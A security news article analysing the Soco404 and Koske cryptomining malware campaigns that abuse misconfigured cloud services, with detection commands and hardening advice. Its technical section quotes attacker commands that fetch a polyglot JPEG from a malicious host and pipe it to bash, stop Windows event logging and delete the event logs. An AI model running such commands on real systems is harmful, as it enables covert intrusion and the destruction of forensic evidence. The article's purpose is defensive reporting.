data breaches

Cloud Security Breakdown: How Koske Malware Hides in JPEGs to Steal Compute Power

Published

3 weeks ago

26 July 2025

New cross-platform malware strains abuse PostgreSQL, Tomcat, JupyterLab, and Confluence to hijack compute power for cryptocurrency mining—leaving cloud workloads vulnerable and detection difficult.

🧨 Introduction: Clouds Turning into Crypto Mines

In what experts are calling one of the most technically advanced cloud attacks of 2025, threat actors have unleashed Soco404 and Koske, two malware strains purpose-built to exploit cloud service misconfigurations, evade traditional detection, and convert Linux and Windows servers into covert cryptocurrency miners.

This incident underscores a new chapter in cyber warfare: cloud-native, fileless, and cross-platform threats that blend in with legitimate activity and live in memory—undetectable to most antivirus tools.

🧬 Attack Flow: Soco404 and Koske Campaigns Visualized

Soco404 Malware Attack Chain (Linux + Windows)

Cloud under attack: Soco404 and Koske malware campaigns exploit misconfigured services and in-memory payloads to hijack compute infrastructure for crypto mining.

Koske Malware Flow (Polyglot Image Payload)

🧪 Technical Analysis: How the Malware Works

⚙️ Soco404 (Linux & Windows)

Linux Payload:
- Delivered via shell dropper script fetched from disguised Google Sites pages (404.html).
- Installs Monero-compatible miner.
- Evades detection using:
  - Process masquerading ([kthreadd], systemd, etc.)
  - Cleaning ~/.bash_history, /var/log/wtmp, and cron jobs
  - Killing competing miners with pkill or killall.
Windows Payload:
- Dropper installs WinRing0.sys to escalate to SYSTEM privileges.
- Deletes itself (cmd /c del %~f0) post-execution to avoid forensic discovery.
- Disables Event Logging: cmd
- sc stop EventLog
- del /f /q %SystemRoot%\System32\winevt\Logs\*

⚙️ Koske (Advanced & Fileless)

Polyglot JPEG Payloads:
- File ends with appended bash shellcode.
- Bypasses scanners by being a valid image.
- Delivered through: bash
- curl -o panda.jpg http://malicious[.]site/panda.jpg
- tail -n +100 panda.jpg | bash
Cryptocurrencies Mined:
- Includes Monero, Ravencoin, Zano, Nexa, and 15+ others using dynamic payloads optimized for CPU/GPU.
Fileless Execution:
- Loads in RAM only. Never touches disk—unseen by EDRs.
- Memory-resident miners built with Go and Rust.

🔎 Detection & Defense: Commands to Spot Soco404 and Koske

🔍 SOC Alerts to Look For:

bash
# Check for high CPU processes not tied to legitimate services
ps aux --sort=-%cpu | head -5

# Look for suspicious processes masquerading as system services
ps -eo pid,comm,args | grep -E '^\[.*\]$|systemd|kthreadd'

# Check scheduled tasks (Linux)
crontab -l
ls -l /etc/cron.*/*

# Audit for Polyglot JPEGs
file *.jpg | grep "shell script"

🧰 Recommended Countermeasures:

Enforce hardened configurations:
- PostgreSQL: Disable remote access, enforce password auth.
- JupyterLab: Set token login or OAuth, never expose publicly.
- Tomcat: Disable manager app on production instances.
- Apache/Confluence: Restrict admin panels to internal IPs.
Enable cloud-level anomaly detection:
- AWS CloudTrail, GCP Audit Logs, and Azure Monitor.
- Trigger alerts on abnormal spikes in CPU or network egress.
Log tampering detection:
- Monitor auditd, syslog-ng, and file hashes with tripwire or Wazuh.

🌍 Human & Business Impact

The financial and operational impact is severe:

💸 Budget Drain: Stolen compute power = massive cloud bills.
🧯Incident Recovery: Systems need to be reimaged and audited.
🎯 Trust Erosion: Stakeholders lose confidence when cloud platforms are abused.

With Soco404 even appearing on Korean transport sites and Koske exploiting academic servers, this threat is not limited to tech firms—it affects education, logistics, and public infrastructure.

🧠 Educational Insight: Why This Matters

These campaigns offer a masterclass in attacker innovation:

Cross-platform mining
Process obfuscation
Log evasion
Memory-only execution
Use of AI (LLMs) to generate code (Koske shows signs of AI-assisted scripting)

They emphasize the urgency of modern cloud security hygiene, such as threat modeling, zero-trust networking, and behavior-based EDR.

📢 Expert Quote

“This is a wake-up call for every DevOps and cloud security team. Malware like Koske isn’t just clever—it’s invisible. We must stop relying on legacy antivirus and start monitoring behavior, logs, and access patterns in real time,”
— Assaf Morag, Lead Threat Analyst, Aqua Security

MAG212